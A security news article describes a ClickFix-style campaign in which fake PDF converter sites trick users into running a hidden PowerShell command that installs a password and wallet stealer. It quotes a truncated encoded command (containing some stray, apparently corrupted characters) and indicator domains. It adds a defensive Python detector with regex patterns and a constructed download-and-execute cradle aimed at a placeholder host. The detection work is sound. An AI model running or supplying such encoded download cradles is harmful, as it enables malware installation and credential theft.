Beware of Online PDF Converters That Trick Users to Install Password-Stealing Malware


Apr 16, 2025 - 20:41

Cybercriminals have launched a sophisticated malware campaign leveraging fake PDF-to-DOCX converter websites that mimic the popular legitimate service PDFCandy.

The malicious websites, including domains such as candyxpdf[.]com and candyconverterpdf[.]com, deploy an elaborate social engineering tactic designed to harvest sensitive information from unsuspecting users seeking to convert document formats.

When users attempt to convert documents on these fraudulent platforms, they’re presented with a seemingly legitimate interface complete with animated loading sequences and familiar conversion options.

After uploading a file, victims encounter a fake CAPTCHA verification that instructs them to press Windows+R (which opens the Run dialog) and paste in a disguised PowerShell command. Once executed, that command starts a multi-stage infection chain that ultimately deploys the ArechClient2 information stealer.

CloudSEK researchers identified the malware as a variant of SectopRAT, a remote access trojan family that has been active since 2019.

Their analysis revealed that the attack uses a multi-stage redirection process, contacting domains such as "bind-new-connect[.]click" before downloading a malicious "adobe.zip" payload hosted on the IP address 172[.]86[.]115[.]43.

The impact of this attack is severe, as the malware is specifically designed to harvest browser credentials, cryptocurrency wallet information, and other sensitive data from compromised systems.

The infection demonstrates advanced evasion techniques, including the abuse of legitimate Windows utilities to bypass security controls.

Mindmap of the malware campaign (Source – Cloudsek)

Infection Mechanism Analysis

The core of this attack is a Base64-encoded PowerShell command that victims execute themselves:

powershell -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgB1AHQALgBXAGUAYgBDAG8AYQBKAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ΘΑΥQANACKAIAB8ACAASQBFAHgA
audiobit.exe (Source – Cloudsek)

The switches tell the story: -win 1 hides the console window, -ep bypass skips the execution-policy check, -noni runs non-interactively, and -enc takes the command as Base64 of a UTF-16LE string so that nothing readable appears on the command line. The readable part of the encoded string decodes to a Net.WebClient download piped into Invoke-Expression (IEX), which initiates the web request chain that retrieves the "adobe.zip" archive; the archive contains multiple files, including the malicious "audiobit[.]exe" executable.

When executed, this file launches MSBuild.exe, a signed Microsoft build tool present on any system with the .NET Framework, and uses it to load the ArechClient2 malware. Because the binary is trusted, this is a classic living-off-the-land (LOLBin) technique that lets the payload run under a legitimate Microsoft process.

The malware performs several suspicious actions, including registry queries, system information discovery, and credential hunting.

It reads the machine GUID and computer name and checks the supported languages before harvesting sensitive data, including stored passwords and cryptocurrency wallet credentials.
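The chain described above (a hidden, policy-bypassing PowerShell one-liner spawned from the Run dialog, followed by MSBuild.exe started by a non-developer process) leaves a clear fingerprint in process-creation telemetry. The following Python detector is an added example written for this article, not CloudSEK's or Cyber Security News' own code; it decodes -EncodedCommand arguments the way PowerShell does (Base64 of UTF-16LE) and tags Sysmon Event ID 1 style records. The sample events, the victim paths and the https://example.invalid URL are constructed for the demonstration, and the set of "expected" MSBuild parents is an assumption you should tune to your environment.

```python
import base64
import re

# Flags seen in the one-liner on the page: -win 1 (hidden window), -ep bypass
# (skip the execution-policy check), -noni (non-interactive) and -enc (Base64
# of the command encoded as UTF-16LE). powershell.exe accepts any unambiguous
# prefix of -EncodedCommand, so the short forms are matched as well.
ENCODED_FLAG = re.compile(r"^[-/](?:e|ec|en|enc[a-z]*)$", re.I)
EXEC_POLICY_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:in\w*)?\s+(?:1|hidden)\b", re.I)
# Download-and-execute cradles: WebClient/DownloadString piped into IEX, etc.
DOWNLOAD_CRADLE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|invoke-expression|\biex\b|frombase64string", re.I)
# Assumption: MSBuild.exe is only expected under these developer-tool parents.
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}


def encode_ps(command: str) -> str:
    """Build an -EncodedCommand argument exactly as PowerShell expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent."""
    tokens = command_line.split()          # Base64 never contains whitespace
    for i, tok in enumerate(tokens[:-1]):
        if ENCODED_FLAG.match(tok):
            blob = tokens[i + 1]
            try:
                raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
                return raw.decode("utf-16-le", errors="replace")
            except ValueError:             # not valid Base64 after all
                return None
    return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Tag one process-creation event (Sysmon EID 1 style fields)."""
    image, parent = _basename(event["Image"]), _basename(event["ParentImage"])
    cmd = event["CommandLine"]
    tags = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            tags.append("encoded_command")
        if DOWNLOAD_CRADLE.search(decoded or cmd):   # inspect the decoded text
            tags.append("download_cradle")
        if EXEC_POLICY_BYPASS.search(cmd):
            tags.append("execution_policy_bypass")
        if HIDDEN_WINDOW.search(cmd):
            tags.append("hidden_window")
        # A command pasted into the Win+R Run dialog is spawned by explorer.exe.
        if parent == "explorer.exe":
            tags.append("launched_from_shell")
    if image == "msbuild.exe" and parent not in EXPECTED_MSBUILD_PARENTS:
        tags.append("msbuild_lolbin")
    return tags


def triage(event: dict):
    """Return (verdict, tags); a cradle or rogue MSBuild is always an alert."""
    tags = classify(event)
    if {"download_cradle", "msbuild_lolbin"} & set(tags) or \
            {"encoded_command", "launched_from_shell"} <= set(tags):
        return "alert", tags
    return ("suspicious" if tags else "benign"), tags


# Constructed sample events, not real telemetry. The URL is a placeholder.
_CRADLE = ("(New-Object Net.WebClient).DownloadString("
           "'https://example.invalid/adobe.zip') | IEx")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -win 1 -ep bypass -noni -enc " + encode_ps(_CRADLE)},
    {"ParentImage": r"C:\Users\victim\Downloads\adobe\audiobit.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild.exe build.proj"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, tags = triage(ev)
        print(f"{verdict:10} {_basename(ev['ParentImage'])} -> "
              f"{_basename(ev['Image'])} {tags}")
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded:
            print("           decoded:", decoded)
```

The point of decoding before matching is that the Base64 blob hides every keyword a naive command-line rule would look for; only the decoded text exposes the WebClient/IEX cradle. The explorer.exe parent is what distinguishes a Run-dialog ClickFix-style execution from an administrator's script, and an MSBuild.exe child of something in a Downloads folder is worth an alert on its own.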

Users are advised to use only trusted file conversion tools from official sources and to treat any website that asks them to run a command, whether in the Run dialog, a terminal, or PowerShell, as malicious, regardless of how legitimate the interface appears.


The post Beware of Online PDF Converters That Trick Users to Install Password-Stealing Malware appeared first on Cyber Security News.